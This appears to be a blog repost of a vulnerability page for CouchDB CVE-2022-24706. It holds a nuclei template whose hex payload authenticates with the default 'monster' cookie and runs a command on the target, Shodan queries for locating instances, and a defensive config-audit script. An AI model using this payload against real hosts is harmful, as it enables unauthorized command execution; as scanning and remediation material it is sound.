CouchDB Erlang Distribution - Remote Command Execution

Vulnerability Information

Vulnerability name: CouchDB Erlang Distribution - Remote Command Execution

Vulnerability ID:

  • CVE: CVE-2022-24706

Vulnerability type: Command execution

Severity: Critical

Vulnerability description: Apache CouchDB is an open-source NoSQL database that focuses on ease of use and on being "a database that fully embraces the web". It is a document-oriented database that stores data as JSON and exposes a RESTful HTTP/HTTPS API, and it is widely used in web applications and services. CouchDB's implementation of the Erlang distribution protocol contains a critical security vulnerability that allows an attacker to access a default CouchDB installation without authentication and obtain administrator privileges. The technical root cause is that the default CouchDB installation used the hard-coded Erlang cookie value "monster", which lets an attacker pass the Erlang distribution protocol's authentication mechanism and bypass its security restrictions. An attacker who successfully exploits this vulnerability can execute arbitrary commands on the affected system, potentially leading to data leakage, service disruption or other malicious activity. Because the vulnerability can be exploited without user interaction and affects a wide range of installations, it is rated critical. Users are advised to upgrade to CouchDB 3.2.2 or later immediately to fix this vulnerability.

Vendor: Apache

Product: CouchDB

Affected versions: version < 3.2.2

Search syntax: product:"CouchDB" OR product:"couchdb" OR cpe:"cpe:2.3:a:apache:couchdb"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2022%2FCVE-2022-24706.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details


id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    epss-score: 0.94412
    epss-percentile: 0.99975
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: apache
    product: couchdb
    shodan-query:
      - product:"CouchDB"
      - product:"couchdb"
      - cpe:"cpe:2.3:a:apache:couchdb"
  tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp

variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:9100"

    inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
# digest: 4a0a0047304502204734da756639045be38d801b4df76f1c1c1ef05903fa15dbd8cef2295be58bdf022100c2d6efedf4a51a7a60be68b7f979be6dde7a87638113a78483ee4150a14439c0:922c64590222798bb761d5b6d8e72950
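The description above and the template's remediation note both reduce this CVE to one setting: the Erlang cookie that CouchDB's default installation shipped as "monster" and that 3.2.2 refuses at startup. The following added audit (example code written for this page, not part of the nuclei template or of CouchDB) parses a CouchDB vm.args file and reports that default cookie; the sample files, the 20-character length floor and the file path you would feed it are assumptions.

```python
"""Audit a CouchDB vm.args file for the default Erlang cookie behind CVE-2022-24706."""
from typing import Dict, List

# Cookie value shipped as the default before CouchDB 3.2.2; 3.2.2+ rejects it on startup.
DEFAULT_COOKIE = "monster"
# Assumption: a local policy floor for cookie length, not a CouchDB requirement.
MIN_COOKIE_LEN = 20


def parse_vm_args(text: str) -> Dict[str, List[str]]:
    """Map each VM flag (e.g. '-setcookie') to the argument strings that follow it,
    one entry per line; '#' comments and blank lines are skipped."""
    flags: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # assumes cookie values contain no '#'
        if not line.startswith("-"):
            continue
        parts = line.split(None, 1)
        flags.setdefault(parts[0], []).append(parts[1].strip() if len(parts) > 1 else "")
    return flags


def audit_vm_args(text: str) -> List[str]:
    """Return findings for every -setcookie line; an empty list means the checks pass."""
    findings: List[str] = []
    cookies = parse_vm_args(text).get("-setcookie", [])
    if not cookies:
        # Without -setcookie the Erlang runtime reads ~/.erlang.cookie instead.
        return ["no -setcookie flag: the node falls back to ~/.erlang.cookie, audit that file"]
    for cookie in cookies:
        if cookie == DEFAULT_COOKIE:
            findings.append("default cookie 'monster': any peer that knows it completes the "
                            "distribution handshake (CVE-2022-24706); set a random cookie")
        elif len(cookie) < MIN_COOKIE_LEN:
            findings.append(f"cookie shorter than {MIN_COOKIE_LEN} characters: easily guessed")
    return findings


# Constructed sample files, not taken from any real installation.
VULNERABLE_VM_ARGS = """\
# Erlang node name
-name couchdb@127.0.0.1
-setcookie monster
-kernel error_logger silent
"""
FIXED_VM_ARGS = """\
-name couchdb@127.0.0.1
-setcookie qJ3vT8mN2pL6wR9xK4hB7cF0
"""

if __name__ == "__main__":
    for label, conf in (("vulnerable", VULNERABLE_VM_ARGS), ("fixed", FIXED_VM_ARGS)):
        print(label, audit_vm_args(conf) or ["ok"])
```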


http://example.com/2025/07/08/github_593911260/
Author: lianccc
Published: July 8, 2025